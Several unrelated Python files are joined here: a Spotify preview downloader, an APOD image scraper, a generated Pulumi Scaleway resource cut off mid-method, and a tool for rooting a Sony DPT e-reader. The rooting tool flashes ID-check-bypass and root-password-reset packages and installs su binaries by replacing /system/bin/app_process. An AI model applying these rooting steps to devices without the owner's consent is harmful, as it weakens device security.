def search_new_song(song_name, artist_name = '', DIR = 'src/data/'):
    """Search Spotify for a track, download its preview clip, return metadata.

    Falls back to a name-only search when the name+artist query has no hits.
    Returns (song_id, track_name, track_artist, song_url, valence, energy)
    on success, or a plain error-message string when the track has no
    preview URL -- callers must handle both return shapes.

    NOTE(review): `wget` is not imported in this file; it presumably arrives
    via the `from spotify_api import *` star import -- confirm, otherwise
    the download line raises NameError.
    """
    search_result = spotify.base_search(song_name + ' ' + artist_name, search_type="track")
    if search_result['tracks']['total'] == 0:
        # Retry without the artist name -- the combined query found nothing.
        search_result = spotify.base_search(song_name, search_type="track")
    prev_url = search_result['tracks']['items'][0]['preview_url']
    if prev_url is None:
        return "Song Cannot Be Downloaded Using Spotify API"
    else:
        song_id = search_result['tracks']['items'][0]['id']
        track_name = search_result['tracks']['items'][0]['name']
        track_artist = search_result['tracks']['items'][0]['album']['artists'][0]['name']
        # Audio features drive the mood classification downstream.
        features = spotify.get_features(song_id)
        valence = features['valence']
        energy = features['energy']
        song_url = search_result['tracks']['items'][0]['external_urls']['spotify']
        wget.download(prev_url, DIR + song_id + '.wav')
        return song_id, track_name, track_artist, song_url, valence, energy
11268612 | <filename>python_api/libInteractive.py
#!/usr/bin/python3
# built-ins
import os
import time
import subprocess
# import traceback
'''
Web Interface API Related
'''
def update_firmware(dpt):
    '''
    Interactively upload a firmware package (.pkg) to the device.

    Prompts for the pkg path, asks for confirmation, then uploads via
    dpt.update_firmware(). Returns True on successful upload, False
    otherwise (bad path, declined/unrecognized answer, or any error).
    '''
    dpt.info_print(
        'Please make sure you have charged your battery before this action.')
    try:
        resp = input('>>> Please enter the pkg file path: ')
        if not os.path.isfile(resp):
            dpt.err_print('File `{}` does not exist!'.format(resp))
            return False
        # BUG FIX: the confirmation prompt previously showed a literal '{}'
        # (missing .format(resp)), and the no/unrecognized branches compared
        # `resp` (the file path) instead of the confirmation answer, so
        # answering 'no' printed 'Unrecognized response: <path>'.
        resp2 = input(
            '>>> Please confirm {} is the pkg file to use [yes/no]: '.format(resp))
        if resp2 == 'yes':
            if not dpt.update_firmware(open(resp, 'rb')):
                dpt.err_print('Failed to upload pkg {}'.format(resp))
                return False
            dpt.info_print('Success!')
            return True
        elif resp2 == 'no':
            dpt.info_print('Okay!')
        else:
            dpt.err_print('Unrecognized response: {}'.format(resp2))
    except BaseException as e:
        dpt.err_print(str(e))
    return False
def validate_required_files(dpt, purpose='diagnosis'):
    """Check that the local asset files needed for *purpose* all exist.

    purpose 'su-binary' requires the su/supolicy binaries; anything else
    (default 'diagnosis') requires the two shankerzhiwu pkg files.
    Returns True when every file is present, False on the first missing one.
    """
    su_assets = [
        'python_api/assets/su',
        'python_api/assets/supolicy',
        'python_api/assets/libsupol.so',
        'python_api/assets/install-recovery.sh'
    ]
    pkg_assets = [
        'python_api/assets/shankerzhiwu_disableidcheck.pkg',
        'python_api/assets/shankerzhiwu_changepwd.pkg'
    ]
    required = su_assets if purpose == 'su-binary' else pkg_assets
    dpt.dbg_print('Checking required files...')
    for asset_path in required:
        if os.path.isfile(asset_path):
            continue
        dpt.err_print('File {0} does not exist!'.format(asset_path))
        return False
    return True
def disable_id_check(dpt):
    '''
    Disable the device's OTG ID check (thanks to shankerzhiwu and his/her
    friend) by flashing the disable-id-check pkg.

    Asks first whether the check was already disabled; returns True when
    disabled (either already, or after a successful flash and the user's
    confirmation that the device rebooted), False on any failure.
    '''
    fp = 'python_api/assets/shankerzhiwu_disableidcheck.pkg'
    try:
        resp = input('>>> Have you disabled the id check already? [yes/no]: ')
        if resp == 'no':
            if not dpt.update_firmware(open(fp, 'rb')):
                dpt.err_print('Failed to upload shankerzhiwu_disableidcheck pkg')
                return False
            # Wait for the user: the flash intentionally ends with an
            # 'update failure' message on the device before WiFi comes back.
            try:
                input(
                    '>>> Press `Enter` key to continue after your DPT reboot, ' +
                    'shows `update failure` message, and connects back to WiFi: ')
            except BaseException as e:
                dpt.err_print(str(e))
                return False
            return True
        elif resp == 'yes':
            return True
        else:
            dpt.err_print('Unrecognized response: {}'.format(resp))
    except BaseException as e:
        dpt.err_print(str(e))
    return False
def reset_root_password(dpt):
    """Reset the device root password (credit: shankerzhiwu and friend).

    Flashes the shankerzhiwu_changepwd package via dpt.update_firmware().
    Returns True on a successful upload, False on upload failure or any
    raised error (which is reported through dpt.err_print).
    """
    pkg_path = 'python_api/assets/shankerzhiwu_changepwd.pkg'
    try:
        if not dpt.update_firmware(open(pkg_path, 'rb')):
            dpt.err_print('Failed to upload shankerzhiwu_changepwd pkg')
            return False
    except BaseException as e:
        dpt.err_print(str(e))
        return False
    return True
def obtain_diagnosis_access(dpt):
    '''
    Obtain root/diagnosis access (hack by shankerzhiwu and an anonymous
    friend): validate the needed pkg assets, disable the OTG ID check,
    then reset the root password. Returns True only if every step succeeds.
    '''
    dpt.info_print(
        'Please make sure you have charged your battery before this action.')
    dpt.info_print(
        'Thank shankerzhiwu (and his/her anonymous friend) a lot on this hack!!!' +
        'All credits go to him (and his/her anonymous friend)!')
    # Both pkg files must exist locally before attempting anything.
    if not validate_required_files(dpt):
        return False
    # step 1: disable the id check
    if not disable_id_check(dpt):
        return False
    dpt.info_print('Congrats! You are half-way through! You have disabled the OTG ID check')
    # step 2: reset root password
    if not reset_root_password(dpt):
        return False
    dpt.info_print(
        'You are all set! Wait till your DPT reboots and ' +
        'shows `update failure` message! More edits will be added to this tool.')
    return True
'''
Diagnosis Related
'''
def print_diagnosis_info():
    """Print the diagnosis-mode help banner listing the supported commands."""
    banner = """============================
DPT Tools - Diagnosis Mode
============================
This is diagnosis mode. Type `help` to show this message.
It behaves similarly to regular serial session with less flexibility (cannot use tab, scroll up, quick reverse search, etc.).
This mode intends to automate some complicated procedures.
Supported commands:
`push-file` -- transfer file to DPT at 512bps
`pull-file` -- transfer file from DPT
`backup-bootimg` -- backup the boot img and download it to local device
`restore-bootimg` -- restore the boot img
`get-su-bin` -- enable `su` (root) in adb (beta, not well tested)
`exit`/`quit` -- leave the tool
and many unix cmds (do not support less/head)
"""
    print(banner)
def diagnosis_pull_file(
    dpt, remotefp=None, folder=None, overwrite=None
):
    '''
    Pull a file from the device over the serial diagnosis session.

    The remote file is split with dd, hexdumped on the device, the hex
    text is captured locally and converted back to binary with xxd.
    Missing arguments are prompted interactively. Returns the local file
    path on success, None on failure/decline.

    Do NOT pull large files this way -- it is extremely slow.
    '''
    try:
        # get and validate remote file path
        if remotefp is None:
            remotefp = input('> DPT file path: ')
        if not dpt.diagnosis_isfile(remotefp):
            dpt.err_print('File {} does not exist!'.format(remotefp))
            return None
        # get local folder path
        if folder is None:
            folder = input('> Local folder path: ')
        if not os.path.isdir(folder):
            resp = input(
                '> {} not exist, create? [yes/no]: '.format(folder))
            if resp == 'no':
                return None
            elif resp == 'yes':
                os.makedirs(folder)
            else:
                dpt.err_print('Unrecognized input {}'.format(resp))
                return None
        # check if local fp exists
        localfp = "{0}/{1}".format(folder, os.path.basename(remotefp))
        if overwrite is None:
            overwrite = True
            if os.path.isfile(localfp):
                resp = input(
                    '> {} exist, overwrite? [yes/no]: '.format(localfp))
                overwrite = True if resp == 'yes' else False
        # get md5 of the remote file so the user can verify the transfer
        md5 = dpt.diagnosis_md5sum_file(remotefp)
        # start
        dpt.info_print("Pulling file {}, plz be patient...".format(localfp))
        if overwrite:
            # read from hexdump, parse, and write to local file
            startTime = int(time.time() * 1000)
            offset = 0
            count = 2
            with open("{}.tmp".format(localfp), 'w') as f:
                while 1:
                    # split file: copy `count` blocks at `offset` into a temp
                    # file on the device
                    cmd = (
                        "dd if={0} skip={1} ".format(remotefp, offset) +
                        "count={0} of=/tmp/sparse.tmp".format(count)
                    )
                    if not dpt.diagnosis_write(cmd):
                        break
                    # cat to download: hexdump the chunk as 32-byte hex lines
                    cmd = (
                        "cat /tmp/sparse.tmp | " +
                        "hexdump -ve '32/1 \"%02X\" \"\\n\"'"
                    )
                    resp = dpt.diagnosis_write(cmd, timeout=99).splitlines()
                    # Drop the echoed command (first line) and the prompt
                    # (last line); an empty payload means EOF.
                    if len(resp[1:-1]) > 0:
                        for each in resp[1:-1]:
                            f.write(each)
                    else:
                        break
                    offset += count
                    if offset % 100 == 0:
                        dpt.info_print("Copying.. at block {}".format(offset))
            # use xxd to convert the hex text back to a binary file
            subprocess.call('xxd -r -p {0}.tmp > {0}'.format(localfp), shell=True)
            duration = int(time.time() * 1000) - startTime
            dpt.info_print('Finished in {0:.2f}sec'.format(duration / 1000.0))
            if os.path.isfile(localfp):
                dpt.info_print("File pulled to: {}".format(localfp))
                dpt.info_print("Please verify if it's MD5 is {}".format(md5))
            os.remove("{}.tmp".format(localfp))
            return localfp
    except BaseException as e:
        dpt.err_print(str(e))
        dpt.err_print("Failed to pull file {}".format(remotefp))
    return None
def diagnosis_push_file(
    dpt, chunkSize=128, localfp=None, folder=None, overwrite=None
):
    '''
    Push a local file to the device over the serial diagnosis session.

    Each chunk is sent as an `echo -e -n '\\x..'` command -- dumb and slow
    but very reliable. chunkSize is capped around 128 bytes because every
    payload byte costs 4 characters on a ~1024-character terminal line.
    Missing arguments are prompted interactively. Returns the remote file
    path on success, None on failure/decline.

    Do NOT push large files this way (a 16MB file takes ~22 minutes).
    '''
    try:
        # get local file path
        if localfp is None:
            localfp = input('> Local file path: ')
        while localfp[-1] == ' ': # remove extra spaces
            localfp = localfp[:-1]
        if not os.path.isfile(localfp):
            dpt.err_print('File {} does not exist!'.format(localfp))
            return None
        # get remote folder and validate it
        if folder is None:
            folder = input('> DPT folder path: ')
        # folder does not exit, create one?
        if not dpt.diagnosis_isfolder(folder):
            resp = input('> {} not exist, create? [yes/no]: '.format(folder))
            if resp == 'no':
                return None
            elif resp == 'yes':
                dpt.diagnosis_write('mkdir -p {}'.format(folder))
            else:
                dpt.err_print('Unrecognized input {}'.format(resp))
                return None
        # remote file exists, overwrite it?
        remotefp = "{0}/{1}".format(folder, os.path.basename(localfp))
        if overwrite is None:
            overwrite = True
            if dpt.diagnosis_isfile(remotefp):
                resp = input(
                    '> {} exist, overwrite? [yes/no]: '.format(remotefp))
                overwrite = True if resp == 'yes' else False
        if overwrite:
            # write through echo: first chunk truncates with '>', the rest
            # append with '>>'
            firstRun = True
            symbol = '>'
            startTime = int(time.time() * 1000)
            totalChunks = 0
            with open(localfp, 'rb') as f:
                while 1:
                    chunk = f.read(chunkSize)
                    if chunk:
                        # Encode the chunk as \xNN escapes for echo -e.
                        cmd = "echo -e -n '\\x{0}' {1} {2}".format(
                            '\\x'.join('{:02x}'.format(x) for x in chunk),
                            symbol,
                            remotefp
                        )
                        # An empty response means the serial write failed.
                        if dpt.diagnosis_write(cmd) == "":
                            raise BaseException
                    else:
                        break
                    if firstRun:
                        symbol = '>>'
                        firstRun = False
                    totalChunks += 1
                    if totalChunks % 100 == 0:
                        dpt.info_print(
                            "Copying.. at chuck {}".format(totalChunks))
            duration = int(time.time() * 1000) - startTime
            dpt.info_print('Finished in {0:.2f}sec'.format(duration / 1000.0))
            if dpt.diagnosis_isfile(remotefp):
                md5 = dpt.diagnosis_md5sum_file(remotefp)
                dpt.info_print("File pushed to: {}".format(remotefp))
                dpt.info_print("It's MD5 is: {}".format(md5))
            return remotefp
    except BaseException as e:
        dpt.err_print(str(e))
    return None
def diagnosis_backup_bootimg(dpt):
    """Back up the boot image on the device, then download it to the CWD.

    Returns True when both the on-device backup and the local pull succeed,
    False otherwise.
    """
    backup_path = dpt.diagnosis_backup_boot()
    if not backup_path:
        dpt.info_print("Nothing happened..")
        return False
    # Download the freshly created backup into the current folder.
    local_path = diagnosis_pull_file(
        dpt, remotefp=backup_path, folder=".", overwrite=True
    )
    if local_path is None:
        dpt.info_print("Nothing happened..")
        return False
    dpt.info_print("Success!")
    return True
def diagnosis_get_su_bin(dpt):
    '''
    Install the su binary into /system over the serial diagnosis session so
    that adb gets root access (system-method install: push binaries into the
    mounted /system partition and rewire app_process to daemonsu).

    Returns False (with an error message) at the first failed step; falls
    off the end (returns None) after printing "Done!" on success.
    '''
    # All four su-related asset files must exist locally.
    if not validate_required_files(dpt, purpose='su-binary'):
        return False
    dpt.info_print("Mounting /system partition..")
    mountpoint = dpt.diagnosis_mount_system()
    dpt.info_print("Mounted to {}".format(mountpoint))
    if not mountpoint:
        dpt.err_print("Nothing happened..")
        return False
    dpt.info_print("Uploading su file to /system/xbin..")
    sufp = diagnosis_push_file(
        dpt,
        localfp='python_api/assets/su',
        folder='{}/xbin'.format(mountpoint),
        overwrite=True)
    if sufp is None:
        dpt.err_print("Due to previous failure, we stopped..")
        return False
    dpt.diagnosis_set_perm(sufp, owner='0.0', perm='0755')
    # daemonsu lives next to su: strip the trailing 'su' and append 'daemonsu'.
    daemonsufp = sufp[:-2] + 'daemonsu'
    dpt.diagnosis_write('cp {0} {1}'.format(sufp, daemonsufp))
    # Hidden .ext folder with a world-writable copy of su (SuperSU layout).
    extfolder = "{}/bin/.ext".format(mountpoint)
    dpt.diagnosis_mkdir(extfolder)
    dpt.diagnosis_set_perm(extfolder, owner='0.0', perm='0777')
    dpt.diagnosis_write('cp {0} {1}/su'.format(sufp, extfolder))
    dpt.info_print("Uploading supolicy file to /system/xbin..")
    supolicyfp = diagnosis_push_file(
        dpt,
        localfp='python_api/assets/supolicy',
        folder='{}/xbin'.format(mountpoint),
        overwrite=True)
    if supolicyfp is None:
        dpt.err_print("Due to previous failure, we stopped..")
        return False
    dpt.diagnosis_set_perm(supolicyfp, owner='0.0', perm='0755')
    libsupolsofp = diagnosis_push_file(
        dpt,
        localfp='python_api/assets/libsupol.so',
        folder='{}/lib'.format(mountpoint),
        overwrite=True)
    if libsupolsofp is None:
        dpt.err_print("Due to previous failure, we stopped..")
        return False
    dpt.diagnosis_set_perm(libsupolsofp, owner='0.0', perm='0644')
    dpt.info_print("Uploading install-recovery.sh to /system/bin..")
    installrecfp = diagnosis_push_file(
        dpt,
        localfp='python_api/assets/install-recovery.sh',
        folder='{}/bin'.format(mountpoint),
        overwrite=True)
    if installrecfp is None:
        dpt.err_print("Due to previous failure, we stopped..")
        return False
    dpt.diagnosis_set_perm(installrecfp, owner='0.0', perm='0755')
    dpt.info_print("Tweaking /system/bin/app_process..")
    # Replace app_process with a symlink to daemonsu (keep a _bak copy).
    appprocessfp = '{0}/bin/app_process'.format(mountpoint)
    dpt.diagnosis_write('mv {0} {0}_bak'.format(appprocessfp))
    dpt.diagnosis_ln(daemonsufp, "/system/bin/app_process")
    dpt.info_print("Tweaking /system/bin/app_process32..")
    appprocess32fp = '{0}32'.format(appprocessfp)
    if dpt.diagnosis_isfile("{}_original".format(appprocess32fp)):
        dpt.diagnosis_remove_file(appprocess32fp)
    else:
        # NOTE(review): this moves app_process, not app_process32, even though
        # the check above looks at app_process32_original -- verify intent.
        dpt.diagnosis_write("mv {0} {0}_original".format(appprocessfp))
    dpt.diagnosis_ln(daemonsufp, "/system/bin/app_process32")
    dpt.info_print("Tweaking /system/bin/app_process_init..")
    if not dpt.diagnosis_isfile("{}_init".format(appprocessfp)):
        dpt.diagnosis_write(
            "cp {0}_ori {1}_init".format(appprocess32fp, appprocessfp))
        dpt.diagnosis_set_perm(
            "{}_init".format(appprocessfp), owner='0.2000', perm='0755')
    # Marker file that tells SuperSU the daemon is already installed.
    dpt.info_print("Misc: add /system/etc/.installed_su_daemon")
    miscfp = "{}/etc/.installed_su_daemon".format(mountpoint)
    dpt.diagnosis_write("echo 1 > {}".format(miscfp))
    dpt.diagnosis_set_perm(miscfp, owner='0.0', perm='0644')
    dpt.info_print("Done!")
def diagnosis_restore_bootimg(dpt, usetmpfp=None, bootimgfp=None):
    '''
    Restore the device boot image, either from the on-device backup
    (/root/boot.img.bak) or from a boot img uploaded interactively.

    usetmpfp: True to use the on-device backup; prompted when None.
    bootimgfp: currently unused -- NOTE(review): likely intended to let the
    caller pass a local img path without prompting.
    Returns True on a successful restore, False otherwise.
    '''
    if usetmpfp is None:
        resp = input('> Upload boot img? [yes/no]: ')
        # Answering 'yes' means "upload my own image", i.e. do NOT use the
        # on-device temp backup.
        usetmpfp = False if resp == 'yes' else True
    # directly use the original backup, if exists
    if usetmpfp:
        dpt.info_print("Trying to use /root/boot.img.bak")
        return dpt.diagnosis_restore_boot(fp="/root/boot.img.bak")
    # otherwise we need to first upload our own boot img
    remotefp = diagnosis_push_file(dpt, folder="/tmp", overwrite=True)
    if remotefp is not None:
        resp = input('> Confirm to continue? [yes/no]: ')
        if resp == 'yes':
            if dpt.diagnosis_restore_boot(fp=remotefp):
                dpt.info_print("Success!")
                return True
            dpt.err_print("Failed..")
            return False
    dpt.err_print("Nothing happened..")
    return False
def diagnosis_cmd(dpt):
    '''
    Run the interactive command loop of diagnosis mode: log in over serial,
    then dispatch the special commands (push-file, pull-file, backup-bootimg,
    restore-bootimg, get-su-bin, help, exit/quit) and forward anything else
    to the device shell, echoing its output.
    '''
    # login
    # NOTE(review): '<PASSWORD>' is a sanitized placeholder left by the
    # dataset scrub -- the real credential must be supplied here.
    if not dpt.diagnosis_login(username='root', password='<PASSWORD>'):
        dpt.err_print('failed to login..')
        return
    # interactive mode
    firstTime = True
    # The prompt mirrors the last line the device shell printed.
    frontLine = 'root #: '
    while 1:
        if firstTime:
            print_diagnosis_info()
            firstTime = False
        try:
            cmd = input(frontLine)
            if cmd == 'exit' or cmd == 'quit':
                break
            elif cmd == 'help':
                print_diagnosis_info()
                continue
            elif cmd == 'push-file':
                diagnosis_push_file(dpt)
                continue
            elif cmd == 'pull-file':
                diagnosis_pull_file(dpt)
                continue
            elif cmd == 'backup-bootimg':
                diagnosis_backup_bootimg(dpt)
                continue
            elif cmd == 'restore-bootimg':
                diagnosis_restore_bootimg(dpt)
                continue
            elif cmd == 'get-su-bin':
                diagnosis_get_su_bin(dpt)
                continue
            rawresp = dpt.diagnosis_write(cmd)
            # ignore first and last echos (echoed command and next prompt)
            tmp = rawresp.splitlines()
            frontLine = tmp[-1]
            resp = tmp[1:-1]
            for line in resp:
                print(line)
        except KeyboardInterrupt:
            break
        except EOFError:
            break
        except BaseException as e:
            dpt.err_print(str(e))
def diagnosis_mode(dpt):
    '''
    Enter diagnosis mode: walk the user through the button sequence that
    boots the device into its serial diagnosis state, connect to the given
    serial port, run the interactive command loop, then shut down cleanly.
    Returns True when a session was completed, False on any abort/error.
    '''
    dpt.info_print('Steps to enter diagnosis mode:')
    dpt.info_print('1. Turn of DPT')
    dpt.info_print('2. Hold HOME button')
    dpt.info_print('3. Press POWER button once. Then light blinks yellow')
    dpt.info_print('4. Release HOME button, a black square will show up')
    dpt.info_print('5. Connect to computer')
    try:
        resp = input('>>> Black square on the screen? [yes/no]: ')
        if resp == 'no':
            return False
        elif not resp == 'yes':
            dpt.err_print('Unrecognized response: {}'.format(resp))
            return False
        ttyName = input('>>> Enter the serial port [/dev/tty.usbmodem01]: ')
        if ttyName == "":
            # Default macOS device node for the DPT in diagnosis mode.
            ttyName = "/dev/tty.usbmodem01"
        if not os.path.exists(ttyName):
            dpt.err_print('serial `{}` not exists!'.format(ttyName))
            return False
    except BaseException as e:
        dpt.err_print(str(e))
        return False
    if not dpt.connect_to_diagnosis(ttyName):
        return False
    diagnosis_cmd(dpt)
    dpt.shut_down_diagnosis()
    return True
| StarcoderdataPython |
6417975 | <reponame>aarora08/nasa-apod-scraper
import asyncio
import re
from dataclasses import InitVar, dataclass, field
from datetime import date, datetime
from pathlib import Path
from typing import Dict
import aiofiles
from aiohttp import ClientSession, client_exceptions, web
from bs4 import BeautifulSoup
from faker import Faker
@dataclass
class Common:
    """Shared fields and helpers for APOD page and image records."""

    relative_url: InitVar[str]
    name: str = field(init=False)
    publish_date: date = field(init=False)
    built_url: str = field(init=False)

    @staticmethod
    def parse_date_name(raw_str: str) -> Dict:
        """Split an APOD title line into 'date', 'name' and 'extra' groups."""
        title_pattern = re.compile(
            r"(?P<date>[\d]{4}\s[\S]*[\s][\d]{1,2})[\s]?-[\s]*(?P<name>[\s\S]*)[\s]?(?P<extra>\n)"
        )
        return title_pattern.search(raw_str).groupdict()

    @staticmethod
    def get_agent():
        """Return a deterministic fake Chrome user-agent string."""
        agent_source = Faker()
        Faker.seed(0)
        return agent_source.chrome()
@dataclass
class Parser(Common):
    """Fetches an APOD page and extracts the image URL, name and date."""

    name: str = field(init=False)
    image_url: str = field(init=False)
    html: BeautifulSoup = field(init=False)
    base_url: str = "https://apod.nasa.gov/apod"

    def __post_init__(self, relative_url):
        # Full page URL built from the relative path passed to the dataclass.
        self.built_url = f"{self.base_url}/{relative_url}"

    async def fetch(self) -> None:
        """Download the page and parse it into self.html."""
        headers = {"User-Agent": self.get_agent()}
        async with ClientSession(headers=headers) as session:
            async with session.get(self.built_url) as response:
                response.raise_for_status()
                data = await response.read()
        try:
            self.html = BeautifulSoup(data, "html5lib")
        except UnicodeDecodeError:
            print("html decoding error")
            # NOTE(review): `raise UnicodeDecodeError` re-raises the bare
            # class; constructing it without arguments raises TypeError
            # instead -- a plain `raise` was probably intended.
            raise UnicodeDecodeError

    def pull_image(self):
        """Extract image URL, name and publish date from the parsed page.

        Raises AttributeError when the page contains no <img> tag.
        """
        image = self.html.findAll("img")
        if not image:
            raise AttributeError
        image = image[0]
        self.image_url = image.get("src") or None
        # The <title> carries the 'YYYY Month D - Name' line parsed below.
        matched_result: Dict = self.parse_date_name(self.html.title.string)
        self.name = matched_result["name"]
        self.publish_date = datetime.strptime(
            matched_result.get("date"), "%Y %B %d"
        ).date()

    def asdict(self) -> Dict:
        """Return the extracted fields as a plain dict."""
        return dict(
            name=self.name, publish_date=self.publish_date, relative_url=self.image_url
        )

    async def run(self):
        """Fetch and parse the page; True on success, False on handled errors.

        AttributeError (no image found) is deliberately re-raised so callers
        can distinguish 'no image on page' from network failures.
        """
        try:
            await self.fetch()
            self.pull_image()
            return True
        except web.HTTPClientError:
            print("url not found")
            return False
        except client_exceptions.ClientConnectorError:
            print("connection denied")
            return False
        except AttributeError:
            print("image not found")
            raise AttributeError
        except UnicodeDecodeError:
            print("why you no work?")
            return False
        except client_exceptions.ClientOSError:
            print("connection denied")
            return False
        except asyncio.TimeoutError:
            print("connection timeout")
            return False
@dataclass
class Image(Common):
    """Downloads one APOD image into a year/month directory tree."""

    name: str
    data_dir: InitVar[str]
    file_name: str = field(init=False)
    publish_date: date
    storage_location: Path = field(init=False)
    base_url: str = "https://apod.nasa.gov/apod"

    def __post_init__(self, relative_url: str, data_dir: str):
        self.built_url = f"{self.base_url}/{relative_url}"
        # Images are stored under <data_dir>/<year>/<MonthName>/.
        self.storage_location = Path(
            f'{data_dir}/{self.publish_date.year}/{self.publish_date.strftime("%B")}'
        )
        self.storage_location.mkdir(parents=True, exist_ok=True)
        # Keep the remote extension; sanitize the name for use as a filename.
        file_ext = relative_url.split(".")[-1]
        self.file_name = f'{self.name.replace(" ", "_").replace("/","_")}.{file_ext}'

    async def save(self):
        """Download the image bytes and write them to storage_location."""
        headers = {"User-Agent": self.get_agent()}
        async with ClientSession(headers=headers) as session:
            async with session.get(self.built_url) as response:
                response.raise_for_status()
                data = await response.read()
        async with aiofiles.open(
            self.storage_location / self.file_name, mode="wb"
        ) as f:
            await f.write(data)
        print(f"saved file for {self.storage_location / self.file_name}")

    async def run(self):
        """Save the image; True on success, False on handled network errors.

        A ClientResponseError ('file not found') is converted to
        AttributeError so callers treat it like a missing image.
        """
        try:
            await self.save()
            return True
        except web.HTTPClientError:
            print("url not found")
            return False
        except client_exceptions.ClientConnectorError:
            print("connection denied")
            return False
        except client_exceptions.ClientResponseError:
            print("file not found")
            raise AttributeError
        except client_exceptions.ClientOSError:
            print("connection denied")
            return False
        except asyncio.TimeoutError:
            print("connection timeout")
            return False
| StarcoderdataPython |
96855 | <reponame>Kamaradeivanov/pulumi-scaleway
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class InstanceSecurityGroup(pulumi.CustomResource):
    """Pulumi resource for a Scaleway instance security group.

    NOTE: this class was generated by the Pulumi Terraform Bridge
    (tfgen) — see the file header; prefer regenerating over hand edits.
    The bare-string blocks after each attribute below are the generated
    per-output documentation and are preserved as-is.
    """
    description: pulumi.Output[str]
    """
    The description of the security group
    """
    external_rules: pulumi.Output[bool]
    inbound_default_policy: pulumi.Output[str]
    """
    Default inbound traffic policy for this security group
    """
    inbound_rules: pulumi.Output[list]
    """
    Inbound rules for this security group

      * `action` (`str`)
      * `ip` (`str`)
      * `ip_range` (`str`)
      * `port` (`float`)
      * `portRange` (`str`)
      * `protocol` (`str`)
    """
    name: pulumi.Output[str]
    """
    The name of the security group
    """
    organization_id: pulumi.Output[str]
    """
    The organization_id you want to attach the resource to
    """
    outbound_default_policy: pulumi.Output[str]
    """
    Default outbound traffic policy for this security group
    """
    outbound_rules: pulumi.Output[list]
    """
    Outbound rules for this security group

      * `action` (`str`)
      * `ip` (`str`)
      * `ip_range` (`str`)
      * `port` (`float`)
      * `portRange` (`str`)
      * `protocol` (`str`)
    """
    stateful: pulumi.Output[bool]
    """
    The stateful value of the security group
    """
    zone: pulumi.Output[str]
    """
    The zone you want to attach the resource to
    """
    def __init__(__self__, resource_name, opts=None, description=None, external_rules=None, inbound_default_policy=None, inbound_rules=None, name=None, organization_id=None, outbound_default_policy=None, outbound_rules=None, stateful=None, zone=None, __props__=None, __name__=None, __opts__=None):
        """
        Create a InstanceSecurityGroup resource with the given unique name, props, and options.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the security group
        :param pulumi.Input[str] inbound_default_policy: Default inbound traffic policy for this security group
        :param pulumi.Input[list] inbound_rules: Inbound rules for this security group
        :param pulumi.Input[str] name: The name of the security group
        :param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
        :param pulumi.Input[str] outbound_default_policy: Default outbound traffic policy for this security group
        :param pulumi.Input[list] outbound_rules: Outbound rules for this security group
        :param pulumi.Input[bool] stateful: The stateful value of the security group
        :param pulumi.Input[str] zone: The zone you want to attach the resource to

        The **inbound_rules** object supports the following:

          * `action` (`pulumi.Input[str]`)
          * `ip` (`pulumi.Input[str]`)
          * `ip_range` (`pulumi.Input[str]`)
          * `port` (`pulumi.Input[float]`)
          * `portRange` (`pulumi.Input[str]`)
          * `protocol` (`pulumi.Input[str]`)

        The **outbound_rules** object supports the following:

          * `action` (`pulumi.Input[str]`)
          * `ip` (`pulumi.Input[str]`)
          * `ip_range` (`pulumi.Input[str]`)
          * `port` (`pulumi.Input[float]`)
          * `portRange` (`pulumi.Input[str]`)
          * `protocol` (`pulumi.Input[str]`)
        """
        # Legacy keyword support: __name__/__opts__ predate resource_name/opts.
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = utilities.get_version()
        if opts.id is None:
            # Creating a new resource: collect the input properties.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()
            __props__['description'] = description
            __props__['external_rules'] = external_rules
            __props__['inbound_default_policy'] = inbound_default_policy
            __props__['inbound_rules'] = inbound_rules
            __props__['name'] = name
            __props__['organization_id'] = organization_id
            __props__['outbound_default_policy'] = outbound_default_policy
            __props__['outbound_rules'] = outbound_rules
            __props__['stateful'] = stateful
            __props__['zone'] = zone
        super(InstanceSecurityGroup, __self__).__init__(
            'scaleway:index/instanceSecurityGroup:InstanceSecurityGroup',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name, id, opts=None, description=None, external_rules=None, inbound_default_policy=None, inbound_rules=None, name=None, organization_id=None, outbound_default_policy=None, outbound_rules=None, stateful=None, zone=None):
        """
        Get an existing InstanceSecurityGroup resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param str id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The description of the security group
        :param pulumi.Input[str] inbound_default_policy: Default inbound traffic policy for this security group
        :param pulumi.Input[list] inbound_rules: Inbound rules for this security group
        :param pulumi.Input[str] name: The name of the security group
        :param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
        :param pulumi.Input[str] outbound_default_policy: Default outbound traffic policy for this security group
        :param pulumi.Input[list] outbound_rules: Outbound rules for this security group
        :param pulumi.Input[bool] stateful: The stateful value of the security group
        :param pulumi.Input[str] zone: The zone you want to attach the resource to

        The **inbound_rules** object supports the following:

          * `action` (`pulumi.Input[str]`)
          * `ip` (`pulumi.Input[str]`)
          * `ip_range` (`pulumi.Input[str]`)
          * `port` (`pulumi.Input[float]`)
          * `portRange` (`pulumi.Input[str]`)
          * `protocol` (`pulumi.Input[str]`)

        The **outbound_rules** object supports the following:

          * `action` (`pulumi.Input[str]`)
          * `ip` (`pulumi.Input[str]`)
          * `ip_range` (`pulumi.Input[str]`)
          * `port` (`pulumi.Input[float]`)
          * `portRange` (`pulumi.Input[str]`)
          * `protocol` (`pulumi.Input[str]`)
        """
        # Looking up an existing resource by provider id.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = dict()
        __props__["description"] = description
        __props__["external_rules"] = external_rules
